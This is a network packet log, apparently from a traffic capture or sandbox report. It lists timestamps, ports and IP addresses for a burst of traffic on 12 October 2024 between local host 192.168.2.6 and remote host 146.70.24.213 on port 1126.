Oct 12, 2024 20:30:04.578460932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578495026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578501940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578527927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578562975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578572035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.579713106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579772949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579802990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579813004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.579888105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579915047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.579921961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579957008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.579965115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.579991102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580024004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580055952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580075026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580110073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580113888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580161095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580194950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580220938 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580243111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580280066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580296040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580308914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580358028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580390930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580414057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580424070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580456018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580468893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580488920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580522060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580533028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580554962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580564976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580595970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580624104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580652952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580657005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580698013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580703974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580748081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580781937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580813885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580841064 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580861092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580864906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580898046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580930948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580954075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.580964088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.580997944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581012011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581029892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581063986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581075907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581098080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581130981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581140995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581163883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581195116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581228971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581229925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581295013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581355095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581389904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581423998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581434011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.581453085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.581543922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.582611084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582644939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582678080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582705975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.582729101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582773924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.582781076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582813978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582848072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582880020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582881927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.582915068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582947016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582952023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.582978964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.582988977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.583013058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583045006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583055019 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.583077908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583111048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583143950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583154917 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.583177090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583210945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583216906 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.583244085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583249092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.583276033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583307028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.583345890 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584440947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584496975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584518909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584635973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584670067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584701061 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584703922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584738016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584765911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584769964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584815025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584820986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584853888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584887981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584909916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584920883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584954977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.584966898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.584989071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585019112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585052013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585062981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585084915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585097075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585118055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585149050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585180998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585197926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585216045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585251093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585278988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585283995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585294962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585318089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585350037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585381985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585390091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585412979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585438013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585445881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585478067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585504055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.585510969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.585572004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670159101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670222044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670254946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670288086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670337915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670334101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670334101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670372009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670407057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670469046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670475006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670506954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670538902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670547009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670568943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670600891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670604944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670634985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670667887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670680046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670701981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670734882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670747042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670769930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670778990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670803070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670835972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670861006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.670886040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670918941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.670924902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672239065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672291994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672310114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672324896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672357082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672367096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672409058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672457933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672467947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672518969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672550917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672579050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672600985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672632933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672678947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672688007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672736883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672770023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672780037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672812939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672818899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672852993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672897100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.672907114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.672957897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673011065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673043966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673054934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673093081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673125982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673140049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673157930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673166990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673207998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673238039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673270941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673286915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673302889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673312902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673336029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673367977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673393011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673401117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673434019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673445940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673465967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673497915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673516989 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673533916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673568010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673580885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673599958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673636913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673641920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673669100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673702955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673717976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673731089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673763037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673791885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673795938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673827887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673861980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673863888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673893929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673927069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.673928976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.673960924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.674010992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.674952984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675003052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675008059 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675045967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675096989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675131083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675142050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675163031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675168991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675194979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675225973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675239086 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675260067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675291061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675302029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675327063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675359011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675371885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.675412893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675446987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.675492048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.677881002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.677915096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.677947044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.677978992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.677978992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.677994967 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678034067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678069115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678082943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678133011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678164959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678184986 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678196907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678229094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678244114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678261995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678292990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678318024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678328991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678359985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678364992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678391933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678422928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678426027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678456068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678486109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678492069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678519011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678550959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678560972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678585052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678616047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678647995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678649902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678679943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678710938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678714037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678742886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678745985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678775072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678806067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678808928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678841114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678872108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678894043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678904057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678935051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678941011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.678967953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.678999901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.679043055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763075113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763359070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763439894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763438940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763477087 CEST	1126	49710	146.70.24.213	192.168.2.6
